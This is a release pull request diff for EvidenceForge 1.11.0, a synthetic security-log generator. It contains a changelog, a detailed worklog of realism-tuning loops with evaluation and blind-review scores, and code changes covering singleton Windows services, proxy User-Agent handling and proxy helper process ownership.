### PR TITLE
Release EvidenceForge 1.11.0

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,27 @@ Detailed development history for the EvidenceForge project. Transferred from TOD
 
 ## Unreleased
 
+## v1.11.0 (2026-07-07)
+
+This minor release extends the current development realism pass with expanded
+scenario validation, source-native generation refinements, and loop-driven
+quality fixes for the expanded iteration-test benchmark.
+
+**Scenario validation and generation refinements**
+
+- Added config validation and system-process data support for new process
+  ownership and service-helper modeling paths (`c8575e96`).
+- Improved canonical generation, source timing, state tracking, eCAR rendering,
+  proxy transaction handling, baseline behavior, and storyline session
+  readiness so endpoint, network, and protocol evidence remains source-native
+  and lifecycle-compatible (`c8575e96`).
+- Added focused regression coverage for activity generation, eCAR source-local
+  process/flow visibility, explicit proxy ownership, source timing, spawn
+  rules, storyline command/session behavior, email STARTTLS byte budgets, and
+  config validation (`c8575e96`).
+- Recorded expanded iteration-test assessment loop outcomes and next realism
+  targets in the branch worklog (`c8575e96`).
+
 ## v1.10.0 (2026-07-06)
 
 This minor release adds full email evidence generation, reusable scenario YAML

--- a/docs/worklog/2026-07-03-iteration-test-expanded-assessment.md
+++ b/docs/worklog/2026-07-03-iteration-test-expanded-assessment.md
@@ -2492,6 +2492,99 @@ original assessment history. This worktree is using branch
   - `uv run ruff check src/evidenceforge/events/observation.py src/evidenceforge/generation/actions/ssh_session.py src/evidenceforge/generation/activity/generator.py tests/unit/test_dispatcher.py tests/unit/test_zeek_activity_contexts.py tests/unit/test_phase5_logoff.py`
   - `uv run ruff format --check src/evidenceforge/events/observation.py src/evidenceforge/generation/actions/ssh_session.py src/evidenceforge/generation/activity/generator.py tests/unit/test_dispatcher.py tests/unit/test_zeek_activity_contexts.py tests/unit/test_phase5_logoff.py`
 
+## Loops 54-59 Continuation
+
+These entries continue the 10-loop run requested for the expanded iteration-test scenario
+(`scenarios/iteration-test-expanded/scenario.yaml`). Detailed reports and score artifacts live
+under `scenarios/iteration-test-expanded/blind-test/loop-N/`.
+
+### Loop 54
+
+- Fix target: eCAR type-7 unlock reanchoring for same-host process timing.
+- Owning layer: source timing / endpoint session anchoring, not source-specific string rendering.
+- Automated eval: `95.3745873581932` over `92,159` records.
+- Hard probe: clustered process creates immediately after type-7 unlock reduced from `6` to `0`.
+- Blind panel: deliberated mean synthetic-confidence `71.75`.
+
+### Loop 55
+
+- Fix target: Windows endpoint process source-timing floor around Security/Sysmon/eCAR process
+  observations.
+- Owning layer: source timing planner and endpoint process observation, so sibling Windows
+  process sources share the same minimum separation contract.
+- Automated eval: `95.36793932982212` over `92,159` records.
+- Hard probe: sub-1ms process timing collapses on MAIL-FIN and WS-EBROOKS reduced to `0`.
+- Blind panel: deliberated mean synthetic-confidence `30.75`.
+
+### Loop 56
+
+- Fix target: PowerShell WebClient proxy/User-Agent semantics.
+- Owning layer: storyline HTTP intent and canonical HTTP context; WebClient should express known
+  absent UA semantics once and have proxy/Zeek render that truth consistently.
+- Automated eval: `95.36793932982212` over `92,159` records.
+- Hard probe: proxy + Zeek WebClient bad User-Agent findings reduced from `2/2` to `0`, with
+  known-absent UA preserved for both.
+- Blind panel: deliberated mean synthetic-confidence `32.5`.
+
+### Loop 57
+
+- Fix target: Windows server/DC explicit-proxy helper process ownership.
+- Owning layer: explicit proxy client-process ownership in activity generation, not proxy emitter
+  postprocessing.
+- Automated eval: `95.70954774058356` over `99,522` records.
+- Hard probe: DC ServiceHealth `explorer.exe` parent findings reduced from `6` to `0`, human
+  principal findings from `6` to `0`, and human proxy-helper flows from `17` to `0`.
+- Blind panel: deliberated mean synthetic-confidence `32.75`.
+
+### Loop 58
+
+- Fix target: typed RDP storyline/session readiness.
+- Owning layer: storyline/session readiness and remote-session state reuse. Typed `rdp_session`
+  events now record the created target logon/session and delay follow-on same-host commands until
+  that remote session is usable.
+- Automated eval: `95.90845223387653` over `96,389` records.
+- Hard probe: RDP max 10-second clusters for source `mstsc.exe`, source FLOW, and DC Type 10
+  logons reduced from `3` to `1`.
+- Blind panel: deliberated mean synthetic-confidence `58.5`; the panel surfaced a new hard
+  network-source contradiction in SMTP STARTTLS byte accounting.
+
+### Loop 59
+
+- Fix target: SMTP STARTTLS certificate byte-budget coherence.
+- Owning layer: canonical network connection context/state. Caller-provided TLS/X.509 contexts
+  now run through the shared certificate-byte coverage invariant before dispatch, and repairs
+  update both connection interval and byte totals.
+- Automated eval: `95.90845223387653` over `96,389` records.
+- Hard probe `hard_probe_smtp_starttls_byte_budget.json`:
+  - Loop 58 offending SMTP STARTTLS UIDs: `26`.
+  - Loop 59 offending SMTP STARTTLS UIDs: `0`.
+  - Max response-byte deficit: `3171` -> `0`.
+  - Max response-IP-byte deficit: `2903` -> `0`.
+  - Minimum response-byte margin over certificate bytes: `-3171` -> `280`.
+- Blind panel:
+  - Initial mean synthetic-confidence: `38.25`; deliberated mean: `42.5`.
+  - Threat Hunter: Inconclusive, confidence `64`, synthetic-confidence `36`; deliberated to
+    Inconclusive, confidence `66`, synthetic-confidence `42`.
+  - Detection Engineer: Synthetic, confidence `68`, synthetic-confidence `62`; deliberated to
+    Synthetic, confidence `70`, synthetic-confidence `60`.
+  - Network Forensics: Real, confidence `64`, synthetic-confidence `28`; deliberated to
+    Inconclusive, confidence `60`, synthetic-confidence `36`.
+  - Host/EDR: Real, confidence `68`, synthetic-confidence `27`; deliberated to Real, confidence
+    `64`, synthetic-confidence `32`.
+- Highest-priority next findings:
+  - P1 ASA connection-ID hidden-volume model: bounded uniform gaps of exactly `1-5` in 6,048
+    built connection IDs.
+  - P1/P2 per-sensor Zeek observation texture: duplicated core/DMZ flows can share identical
+    nonzero `missed_bytes`.
+  - P2 eCAR FLOW thread/process attribution semantics.
+  - P2 Windows endpoint inbound network collection profile.
+  - P3 Zeek Kerberos analyzer coverage/profile clarity.
+- Verification for loop 59:
+  - `uv run pytest --no-cov -q tests/unit/test_email_evidence.py -k "smtp_starttls_certificate_files_fit_connection_response_budget or outbound_route_group_override_and_global_isp_relay or smtp_starttls_tls12_cipher"` (`3 passed`).
+  - `uv run ruff check .`
+  - `uv run ruff format --check .`
+  - `uv run pytest --no-cov -q` (`4874 passed, 19 skipped`).
+
 ## Loop 49 Fix Target
 
 - Selected family: canonical endpoint lifecycle/session ownership for process termination.
@@ -2572,6 +2665,297 @@ original assessment history. This worktree is using branch
     - Secondary targets: stable Sysmon `LogonGuid` per `(host, LogonId)`, source-native Windows
       4672 privilege lists, Linux local session-open anchoring, static web/proxy object byte
       stability, proxy CONNECT visibility contracts, and host-specific WFP device-volume mappings.
+
+## Loop 50 Fix Target
+
+- Selected family: Windows singleton service-agent lifecycle.
+- Owning abstraction: data-driven system service catalog plus canonical process/session state.
+- Invariant: a configured Windows service agent parented by `services.exe` must not overlap as
+  multiple active same-host executable instances. New launch requests reuse the active canonical
+  process unless stop/restart evidence exists.
+- Entry paths: workstation service-process noise, regular `generate_process()` calls with
+  `services.exe` parents, stale process cleanup, service catalog validation, and
+  Security/Sysmon/eCAR process lifecycle rendering.
+- Consumers: Host/EDR review, Windows process tree reconstruction, Sysmon Event ID 1/5, Security
+  4688/4689, eCAR process lifecycle rows, and singleton process hard probes.
+- Layer rationale: the blind-panel finding came from duplicate canonical process creation before
+  rendering. Fixing an emitter would have hidden only one source and left the canonical state free
+  to produce sibling contradictions.
+
+### Loop 50 implementation notes
+
+- Root cause: Program Files security agents such as `PanGPS.exe`, `vpnagent.exe`,
+  `ZSAService.exe`, and `ZSATunnel.exe` behaved like long-running SCM-managed service agents, but
+  only a small built-in `System32` executable set had singleton reuse semantics. Generic stale
+  cleanup could also terminate these product services and allow later overlapping creates.
+- Implemented changes:
+  - Added `singleton: true` to the system service catalog/schema and marked the relevant
+    workstation service agents.
+  - Loaded configured singleton service paths from YAML and merged them with built-in Windows
+    service singleton paths.
+  - Reused active same-host singleton service processes from both baseline service noise and
+    regular `generate_process()` calls with a `services.exe` parent, including out-of-order
+    generation reuse when the candidate is already planned.
+  - Protected configured singleton service agents from generic stale-process cleanup.
+  - Added config validation so singleton service declarations must be concrete Windows service
+    paths owned by the `services` parent.
+  - Added focused regressions for service reuse, regular process-path reuse, out-of-order reuse,
+    stale cleanup protection, and invalid singleton catalog entries.
+- Verification passed:
+  - `uv run pytest --no-cov tests/unit/test_spawn_rules.py -k "singleton_service"`
+  - `uv run pytest --no-cov tests/unit/test_phase5_system_traffic.py -k "singleton_windows_service or singleton_service_image"`
+  - `uv run pytest --no-cov tests/unit/test_validate_config.py -k "singleton_service or boot_only_process"`
+  - `uv run eforge validate-config`
+  - `uv run eforge validate scenarios/iteration-test-expanded/scenario.yaml`
+  - `uv run pytest --no-cov`
+  - `uv run ruff check .`
+  - `uv run ruff format --check .`
+- Generated loop 50 output successfully.
+- Automated eval passed at `95.17680672823963` over 93,433 records.
+- Pillars:
+  - Parseability: `100.0`
+  - Plausibility: `96.11786257759402`
+  - Causality: `87.99630844954882`
+  - Timing: `95.74131985726953`
+- Hard probe `hard_probe_windows_singleton_service_overlap.json`:
+  - Loop 49 comparison: failed with `40` overlapping singleton service-agent creates.
+  - Loop 50: `passed` with `12` singleton service creates, `2` terminates, and `0` overlaps.
+- Blind review:
+  - Initial mean synthetic-confidence: `46.25`; deliberated mean: `55.25`
+    (`Mixed/Inconclusive`).
+  - Reviewer scores:
+    - Threat Hunter: Inconclusive, confidence `66`, synthetic-confidence `38`; deliberated to
+      Inconclusive synthetic-leaning, confidence `68`, synthetic-confidence `52`.
+    - Detection Engineer: Inconclusive, confidence `58`, synthetic-confidence `38`; deliberated
+      to Inconclusive synthetic-leaning, confidence `64`, synthetic-confidence `54`.
+    - Network Forensics: Inconclusive, confidence `64`, synthetic-confidence `42`; deliberated to
+      Inconclusive, confidence `66`, synthetic-confidence `45`.
+    - Host/EDR: Synthetic, confidence `62`, synthetic-confidence `67`; deliberated to Synthetic,
+      confidence `68`, synthetic-confidence `70`.
+  - Panel consensus and prioritized findings:
+    - The loop 49 singleton service-agent overlap family is fixed by hard probe.
+    - Highest-impact future target: Windows process-tree ownership for shell wrappers and command
+      tools. `FILE-SRV-01` contains a `cmd.exe /c net.exe` parent for child `net.exe` evidence with
+      command line `net view \\FILE-SRV-01`, an impossible parent/child command relationship.
+    - Secondary targets: Zeek network collection-window clipping, mail artifact/profile alignment,
+      static web/proxy asset byte stability, HTTP keep-alive timing, NTP/DHCP texture, Linux sudo
+      rhythms, and bash foreground timestamp texture.
+
+## Loop 51 Fix Target
+
+- Selected family: Windows shell-wrapper parent ownership.
+- Owning abstraction: Windows process parent selection plus canonical process/session state.
+- Invariant: a one-shot Windows shell wrapper parent must be command-compatible with the child
+  process it launches. A `cmd.exe /c <payload>` parent can own a child only when `<payload>` begins
+  with the child executable command signature, including meaningful command arguments.
+- Entry paths: typed storyline process events, spawn-rule parent resolution, service/network-logon
+  utility execution, parent sanitization, Sysmon/Security/eCAR process rendering, and process-tree
+  hard probes.
+- Consumers: Host/EDR review, Windows process tree reconstruction, Sysmon Event ID 1, Security
+  4688, eCAR `PROCESS CREATE`, and downstream command-line lineage analytics.
+- Layer rationale: the contradiction was introduced in canonical parent selection after the
+  correct shell wrapper had already been resolved. Fixing one emitter would have hidden only one
+  source and left sibling process evidence inconsistent.
+
+### Loop 51 implementation notes
+
+- Root cause: `_resolve_parent(..., command_line)` correctly created
+  `cmd.exe /c net view \\FILE-SRV-01`, but `_sanitize_user_parent_pid()` rejected one-shot shell
+  parents categorically and fell back to `_resolve_parent(..., process_name)` without the command
+  line. The fallback created a duplicate `cmd.exe /c net.exe` shell parent, which could not have
+  launched the rendered child command line.
+- Implemented changes:
+  - Added command-signature helpers for one-shot Windows shell wrapper payloads.
+  - Allowed a one-shot shell wrapper parent only when its payload directly invokes the child command
+    signature.
+  - Passed the full child command line through fallback parent resolution.
+  - Added a focused regression for the service/network-logon `net view \\FILE-SRV-01` case.
+- Focused verification passed:
+  - `uv run pytest --no-cov tests/unit/test_spawn_rules.py -k "one_shot_shell_parent or network_command_keeps_matching_one_shot_shell_parent or system_admin_utility_gets_service_shell_parent"`
+  - `uv run pytest --no-cov tests/unit/test_activity.py -k "rejects_one_shot_shell_parent"`
+  - `uv run pytest --no-cov tests/unit/test_spawn_rules.py -k "network_command_keeps_matching_one_shot_shell_parent or system_admin_utility_owner_depends_on_remote_execution_family"`
+  - `uv run ruff check src/evidenceforge/generation/activity/generator.py tests/unit/test_spawn_rules.py`
+  - `uv run ruff format --check src/evidenceforge/generation/activity/generator.py tests/unit/test_spawn_rules.py`
+- Generated loop 51 output successfully.
+- Automated eval passed at `95.17623466907877` over 93,443 records.
+- Pillars:
+  - Parseability: `100.0`
+  - Plausibility: `96.11876002308942`
+  - Causality: `87.99445865302643`
+  - Timing: `95.73965000024901`
+- Hard probe `hard_probe_windows_shell_parent_command_match.json`:
+  - Loop 50 comparison: failed with `3` shell-parent command mismatches.
+  - Loop 51: `passed` with `0` shell-parent command mismatches.
+- Blind review:
+  - Initial mean synthetic-confidence: `37.75`; deliberated mean: `48.5`
+    (`Borderline Mixed/Inconclusive`).
+  - Reviewer scores:
+    - Threat Hunter: Real, confidence `72`, synthetic-confidence `28`; deliberated to Real
+      weakened, confidence `58`, synthetic-confidence `42`.
+    - Detection Engineer: Real, confidence `64`, synthetic-confidence `31`; deliberated to
+      Borderline Synthetic, confidence `55`, synthetic-confidence `52`.
+    - Network Forensics: Real, confidence `78`, synthetic-confidence `24`; deliberated to Real,
+      confidence `74`, synthetic-confidence `28`.
+    - Host/EDR: Synthetic, confidence `68`, synthetic-confidence `68`; deliberated to Synthetic,
+      confidence `72`, synthetic-confidence `72`.
+  - Panel consensus and prioritized findings:
+    - The loop 50 Windows shell-wrapper parent mismatch is fixed by hard probe.
+    - Highest-impact future target: Linux desktop/session/process realism. Reviewers converged on
+      repeated `/usr/lib/systemd/systemd --user` creation under the same logon/session IDs, active
+      bash/eCAR activity without coherent session-open lifecycle, and many similarly shaped
+      `python3 -c 'import requests; requests.get(...)'` process creates under terminal parents.
+    - Secondary targets: Linux cron/system identity and sysstat cadence, network collection-window
+      clipping, collection-profile artifact alignment, and repeated Windows unlock-style eCAR
+      `USER_SESSION LOGIN` rows.
+
+## Loop 52 Fix Target
+
+- Selected family: Linux desktop session and process lifecycle realism.
+- Owning abstraction: Linux user-session/action lifecycle plus canonical process/activity
+  generation.
+- Invariant: one Linux local desktop session should have one durable per-session user manager.
+  Rebuilding terminal/shell ancestry later in the same session must not recreate
+  `/usr/lib/systemd/systemd --user`. Generic workstation proxy web traffic should not invent
+  visible terminal-launched `python3 -c 'import requests...'` process evidence unless a modeled
+  process actually owns that activity.
+- Entry paths: Linux local logon bootstrap, visible shell-parent creation, process parent
+  resolution, explicit proxy client process hints, eCAR process/flow rendering, and desktop hard
+  probes.
+- Consumers: Host/EDR review, Linux session reconstruction, eCAR process trees, proxy-flow process
+  attribution, and downstream analytics that join session IDs, PIDs, and process ancestry.
+- Layer rationale: the defects were caused before rendering, by session/process ownership and
+  activity attribution. Fixing eCAR strings or hiding rows in an emitter would have left sibling
+  state and future process-tree decisions inconsistent.
+
+### Loop 52 implementation notes
+
+- Root cause: `_ensure_linux_local_session_shell_parent()` always created a new
+  `/usr/lib/systemd/systemd --user` process before terminal/shell ancestry. If a later command
+  needed a new shell under the same active session, `ensure_linux_session_shell()` only knew about
+  the previous shell PID, so it rebuilt the whole user-manager -> terminal -> bash chain. In
+  parallel, generic Linux workstation `python-requests/` user agents were mapped to visible
+  terminal-launched Python snippets for ordinary SaaS/CDN proxy traffic.
+- Implemented changes:
+  - Added durable `session_user_manager_pid` state to `ActiveSession` and cleared it with other
+    session process references.
+  - Reused an active Linux per-session user manager and active terminal/login parent when rebuilding
+    local session shell ancestry.
+  - Routed visible Linux shell-parent materialization through the active session shell path when a
+    valid active logon ID exists.
+  - Stopped attributing generic Linux workstation `python-requests/` proxy traffic to synthetic
+    terminal-launched `python3 -c 'import requests...'` processes while preserving modeled
+    server/background process ownership.
+  - Added focused regressions for rebuilt Linux session shells and workstation proxy attribution.
+- Focused verification passed:
+  - `uv run pytest --no-cov tests/unit/test_activity.py -k "linux_session_shell_reuses_user_manager_when_rebuilt or linux_workstation_python_requests_proxy_stays_unattributed"`
+  - `uv run pytest --no-cov tests/unit/test_explicit_proxy.py -k "python or proxy_client_hint or package_proxy_client_uses_system_owner or background_helper_process"`
+  - `uv run pytest --no-cov tests/unit/test_world_model.py -k "linux_local_session_shell_has_visible_terminal_parent"`
+  - `uv run pytest --no-cov tests/unit/test_spawn_rules.py -k "linux_generate_process_replaces_hidden_boot_shell_without_session or linux_resolve_parent_materializes_visible_shell_without_session or linux_process_creation_guard_materializes_hidden_shell_parent"`
+  - `uv run ruff check src/evidenceforge/models/state.py src/evidenceforge/generation/state_manager.py src/evidenceforge/generation/activity/generator.py tests/unit/test_activity.py`
+  - `uv run ruff format --check src/evidenceforge/models/state.py src/evidenceforge/generation/state_manager.py src/evidenceforge/generation/activity/generator.py tests/unit/test_activity.py`
+- Full verification passed:
+  - `uv run pytest --no-cov` (`4861 passed, 19 skipped`)
+  - `uv run ruff check .`
+  - `uv run ruff format --check .`
+- Generated loop 52 output successfully.
+- Automated eval passed at `95.31401154149356` over 92,159 records.
+- Pillars:
+  - Parseability: `100.0`
+  - Plausibility: `94.9464460391597`
+  - Causality: `89.84597659329332`
+  - Timing: `95.57952941690148`
+- Hard probe `hard_probe_linux_desktop_session_process_realism.json`:
+  - Loop 51 comparison: failed with `2` duplicate Linux user-manager sessions and `30` desktop
+    `python-requests` process creates.
+  - Loop 52: `passed` with `0` duplicate Linux user-manager sessions and `0` desktop
+    `python-requests` process creates.
+- Blind review:
+  - Initial mean synthetic-confidence: `69.0`; deliberated mean: `77.0` (`Synthetic`).
+  - Reviewer scores:
+    - Threat Hunter: Synthetic but highly huntable, confidence `78`, synthetic-confidence `84`;
+      deliberated to Synthetic but highly huntable, confidence `82`, synthetic-confidence `86`.
+    - Detection Engineer: Inconclusive leaning Realistic/Real, confidence `74`,
+      synthetic-confidence `38`; deliberated to Inconclusive leaning Synthetic, confidence `68`,
+      synthetic-confidence `58`.
+    - Network Forensics: Synthetic, confidence `68`, synthetic-confidence `72`; deliberated to
+      Synthetic, confidence `72`, synthetic-confidence `76`.
+    - Host/EDR: Synthetic, confidence `76`, synthetic-confidence `82`; deliberated to Synthetic,
+      confidence `84`, synthetic-confidence `88`.
+  - Panel consensus and prioritized findings:
+    - The loop 51 Linux desktop/session family is fixed by hard probe.
+    - Highest-impact future target: host/EDR source-local lifecycle coherence for eCAR flow actor
+      attribution. Reviewers found many flow rows with precise process actor IDs but no matching
+      same-host process-create lifecycle support.
+    - Secondary targets: Windows remote-execution provenance for WMI/DC activity, proxy identity
+      alignment, IDS/web/proxy texture, and collection-profile artifact/package alignment.
+
+## Loop 53 Fix Target
+
+- Selected family: eCAR source-local flow actor lifecycle visibility.
+- Owning abstraction: eCAR source-observation normalization over canonical process/session state.
+- Invariant: eCAR `FLOW/CONNECT` rows must not render precise process actor identity unless the
+  same host stream contains a visible `PROCESS/CREATE` for that actor. If the process lifecycle is
+  not source-visible, keep the network fact but render it as unattributed.
+- Entry paths: network connection rendering, source timing, process visibility, eCAR close-time
+  normalization, output-window filtering, and per-host EDR review.
+- Consumers: Host/EDR review, detection rules that pivot from flow actor to process tree, endpoint
+  source-local graph reconstruction, and cross-source process/network joins.
+- Layer rationale: the canonical process can be globally true while the eCAR source-local stream
+  lacks the process lifecycle. The fix belongs after source observation and timing settle, where
+  eCAR decides what identity this host stream can honestly show.
+
+### Loop 53 implementation notes
+
+- Root cause: eCAR could render `FLOW/CONNECT` `actorID` values from canonical process state even
+  when the same host's eCAR stream had no visible `PROCESS/CREATE` for that process. This created
+  dangling source-local graph edges: reviewers saw precise flow actors that could not be
+  reconstructed from the host file.
+- Implemented changes:
+  - Added `_normalize_flow_process_actor_visibility()` as a final per-host eCAR close-time pass.
+  - The pass builds the visible process-create object set for the host and drops process identity
+    from `FLOW/CONNECT` rows whose actor is absent from that set.
+  - Reused the existing `_drop_flow_process_identity()` behavior so transport evidence remains
+    intact while unsafe process attribution is removed.
+  - Added regressions that scrub a dangling flow actor and preserve a flow actor with matching
+    source-visible process create.
+- Focused verification passed:
+  - `uv run pytest --no-cov tests/unit/test_ecar_spec_compliance.py -k "scrubs_flow_actor_without_visible_process_create or preserves_flow_actor_with_visible_process_create or scrubs_stale_flow_process_identity_after_process_terminate or actor_linked_flow_renders_after_process_create or outbound_flow_with_pid_only_renders_after_process_create"`
+  - `uv run pytest --no-cov tests/unit/test_ecar_spec_compliance.py`
+  - `uv run pytest --no-cov tests/unit/test_source_timing.py -k "FLOW or ecar or process_reference or endpoint"`
+  - `uv run ruff check src/evidenceforge/generation/emitters/ecar.py tests/unit/test_ecar_spec_compliance.py`
+  - `uv run ruff format --check src/evidenceforge/generation/emitters/ecar.py tests/unit/test_ecar_spec_compliance.py`
+- Full verification passed:
+  - `uv run pytest --no-cov` (`4863 passed, 19 skipped`)
+- Generated loop 53 output successfully.
+- Automated eval passed at `95.3745873581932` over 92,159 records.
+- Pillars:
+  - Parseability: `100.0`
+  - Plausibility: `95.14644603915968`
+  - Causality: `89.89042991620664`
+  - Timing: `95.57684184675803`
+- Hard probe `hard_probe_ecar_flow_actor_visibility.json`:
+  - Loop 52 comparison: failed with `13,930` eCAR `FLOW/CONNECT` actor IDs that lacked a
+    same-host `PROCESS/CREATE`.
+  - Loop 53: `passed` with `0` dangling flow actor IDs and `760` preserved visible flow actors.
+- Blind review:
+  - Initial mean synthetic-confidence: `72.0`; deliberated mean: `73.0` (`Synthetic`).
+  - Reviewer scores:
+    - Threat Hunter: Synthetic, confidence `72`, synthetic-confidence `68`; deliberated to
+      Synthetic, confidence `74`, synthetic-confidence `70`.
+    - Detection Engineer: Synthetic, confidence `82`, synthetic-confidence `86`; deliberated to
+      Synthetic, confidence `80`, synthetic-confidence `82`.
+    - Network Forensics: Inconclusive leaning synthetic, confidence `64`, synthetic-confidence
+      `56`; deliberated to Inconclusive leaning synthetic, confidence `66`, synthetic-confidence
+      `58`.
+    - Host/EDR: Synthetic, confidence `86`, synthetic-confidence `78`; deliberated to Synthetic,
+      confidence `88`, synthetic-confidence `82`.
+  - Panel consensus and prioritized findings:
+    - The loop 52 eCAR flow actor visibility defect is fixed by hard probe.
+    - Highest-impact future target: eCAR source-local endpoint lifecycle timing and identity
+      ownership. A type-7 unlock/login on `WS-AJOHNSON-01` was followed within about 120 ms by
+      multiple unrelated process creates that native Windows Security/Sysmon placed much earlier.
+    - Secondary targets: Windows remote-admin provenance, source-observation completeness/dedup,
+      network timing/cache ownership, and benign variation pools.
 - Generated loop 48 output successfully.
 - Automated eval passed at `95.17991488181465` over 94,702 records.
 - Pillars:

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -22,7 +22,7 @@
 
 [project]
 name = "evidence-forge"
-version = "1.10.0"
+version = "1.11.0"
 description = "Generate realistic synthetic security logs for cybersecurity threat hunting training and research"
 readme = "README.md"
 license = "MIT"

--- a/src/evidenceforge/__init__.py
+++ b/src/evidenceforge/__init__.py
@@ -27,5 +27,5 @@ for cybersecurity threat hunting training and research. It uses a two-phase
 architecture combining LLM-driven scenario creation with deterministic log generation.
 """
 
-__version__ = "1.10.0"
+__version__ = "1.11.0"
 __all__ = []  # Will be expanded as modules are implemented

--- a/src/evidenceforge/cli/validate_config.py
+++ b/src/evidenceforge/cli/validate_config.py
@@ -2526,6 +2526,25 @@ def validate_config() -> ValidationResult:
                             f'Boot-only Windows process "{exe}" must be seeded at boot, not emitted as recurring system_services.{role_name}',
                         )
                     )
+                if entry.get("singleton"):
+                    parent = str(entry.get("parent") or "").lower()
+                    if parent != "services":
+                        result.issues.append(
+                            Issue(
+                                "ERROR",
+                                "system_processes.yaml",
+                                f'Singleton Windows service "{exe}" in system_services.{role_name} must use parent "services"',
+                            )
+                        )
+                    normalized_image = image.replace("/", "\\").lower()
+                    if not normalized_image.startswith("c:\\") or "\\" not in normalized_image:
+                        result.issues.append(
+                            Issue(
+                                "ERROR",
+                                "system_processes.yaml",
+                                f'Singleton Windows service "{exe}" in system_services.{role_name} must use a concrete Windows image path',
+                            )
+                        )
 
     # process_network_map.yaml
     if isinstance(process_net_data, list):

--- a/src/evidenceforge/config/activity/system_processes.yaml
+++ b/src/evidenceforge/config/activity/system_processes.yaml
@@ -195,6 +195,7 @@ system_services:
       command_templates:
         - "vpnagent.exe"
       parent: services
+      singleton: true
       loaded_modules:
         - path: "C:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnapi.dll"
           signature: "Cisco Systems, Inc."
@@ -208,6 +209,7 @@ system_services:
       command_templates:
         - "PanGPS.exe"
       parent: services
+      singleton: true
       loaded_modules:
         - path: "C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGpHip.dll"
           signature: "Palo Alto Networks, Inc."
@@ -215,6 +217,7 @@ system_services:
       command_templates:
         - "ZSAService.exe"
       parent: services
+      singleton: true
       loaded_modules:
         - path: "C:\\Program Files\\Zscaler\\ZSAService\\ZSACommon.dll"
           signature: "Zscaler, Inc."
@@ -222,6 +225,7 @@ system_services:
       command_templates:
         - "ZSATunnel.exe"
       parent: services
+      singleton: true
       loaded_modules:
         - path: "C:\\Program Files\\Zscaler\\ZSATunnel\\ZSATunnel.dll"
           signature: "Zscaler, Inc."

--- a/src/evidenceforge/config/schemas.py
+++ b/src/evidenceforge/config/schemas.py
@@ -2211,6 +2211,7 @@ class SystemServiceEntry(BaseModel, extra="forbid"):
     parent: str
     params: dict[str, list[str]] | None = None
     loaded_modules: list[LoadedModuleEntry] | None = None
+    singleton: bool = False
 
 
 class SystemBinaryEntry(BaseModel, extra="forbid"):

--- a/src/evidenceforge/events/contexts.py
+++ b/src/evidenceforge/events/contexts.py
@@ -414,6 +414,7 @@ class HttpContext:
     uri: str = "/"
     version: str = "1.1"
     user_agent: str = ""
+    user_agent_known_absent: bool = False
     request_body_len: int = 0
     response_body_len: int = 0
     flow_request_body_len: int | None = None

--- a/src/evidenceforge/generation/actions/proxy_transaction.py
+++ b/src/evidenceforge/generation/actions/proxy_transaction.py
@@ -612,6 +612,7 @@ class ProxyTransactionActionBundle:
                 uri=proxy_context.url,
                 version=request.http.version,
                 user_agent=request.http.user_agent,
+                user_agent_known_absent=request.http.user_agent_known_absent,
                 request_body_len=request.http.request_body_len,
                 response_body_len=response_body_len,
                 flow_request_body_len=request.http.flow_request_body_len,

--- a/src/evidenceforge/generation/activity/generator.py
+++ b/src/evidenceforge/generation/activity/generator.py
@@ -318,6 +318,9 @@ _WINDOWS_SINGLETON_SERVICE_EXES = frozenset(
         "msdtc.exe",
     }
 )
+_WINDOWS_SINGLETON_SERVICE_PATHS = {
+    exe: {f"c:\\windows\\system32\\{exe}"} for exe in _WINDOWS_SINGLETON_SERVICE_EXES
+}
 _FILE_ACTION_EVENT_TYPES = {
     "read": "file_read",
     "create": "file_create",
@@ -6738,18 +6741,22 @@ class ActivityGenerator:
             proxy_content_type = "text/html"
 
         apply_domain_user_agent = http is None or (
-            not _is_tool_http_user_agent(http.user_agent)
+            not getattr(http, "user_agent_known_absent", False)
+            and not _is_tool_http_user_agent(http.user_agent)
             and not is_browser_like_proxy_domain(proxy_hostname, domain_tags=domain_tags)
         )
-        user_agent = self._proxy_user_agent_for_context(
-            rng,
-            source_system,
-            hostname=proxy_hostname,
-            domain_tags=domain_tags,
-            existing_user_agent=user_agent,
-            override_user_agent=proxy_ua_override,
-            apply_domain_override=apply_domain_user_agent,
-        )
+        if http is not None and getattr(http, "user_agent_known_absent", False):
+            user_agent = ""
+        else:
+            user_agent = self._proxy_user_agent_for_context(
+                rng,
+                source_system,
+                hostname=proxy_hostname,
+                domain_tags=domain_tags,
+                existing_user_agent=user_agent,
+                override_user_agent=proxy_ua_override,
+                apply_domain_override=apply_domain_user_agent,
+            )
         proxy_referrer = _source_native_http_referrer(
             user_agent,
             proxy_referrer,
@@ -6964,10 +6971,7 @@ class ActivityGenerator:
                     f"wget -e use_proxy=yes -e http_proxy={proxy_url} {target_url}",
                 )
             if ua.startswith("python-requests/"):
-                return (
-                    "/usr/bin/python3",
-                    f"python3 -c 'import requests; requests.get(\"{target_url}\")'",
-                )
+                return None
             if ua.startswith("go-http-client/"):
                 return "/usr/local/bin/service-healthcheck", (
                     f"service-healthcheck --url {target_url}"
@@ -7120,6 +7124,39 @@ class ActivityGenerator:
                 image,
                 command_line,
                 "www-data",
+            )
+        return None
+
+    def _windows_proxy_helper_system_owner_spec(
+        self,
+        *,
+        source_system: System,
+        image: str,
+        command_line: str,
+    ) -> tuple[str, str, str, str] | None:
+        """Return system-owned process metadata for Windows server proxy helpers."""
+        if _get_os_category(source_system.os) != "windows":
+            return None
+        if not self._is_proxy_server_like_source(source_system):
+            return None
+
+        image_lower = image.lower()
+        command_lower = command_line.lower()
+        exe_name = image_lower.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
+
+        if exe_name == "service-healthcheck.exe":
+            return (
+                f"service_healthcheck_proxy:{command_line}",
+                image,
+                command_line,
+                "SYSTEM",
+            )
+        if exe_name == "java.exe" and "integration-worker" in command_lower:
+            return (
+                f"integration_worker_proxy:{command_line}",
+                image,
+                command_line,
+                "SYSTEM",
             )
         return None
 
@@ -7386,6 +7423,22 @@ class ActivityGenerator:
 
         image, command_line = hint
         os_category = _get_os_category(source_system.os)
+        system_owner_spec = self._windows_proxy_helper_system_owner_spec(
+            source_system=source_system,
+            image=image,
+            command_line=command_line,
+        )
+        if system_owner_spec is not None:
+            key, owner_image, owner_command_line, owner_username = system_owner_spec
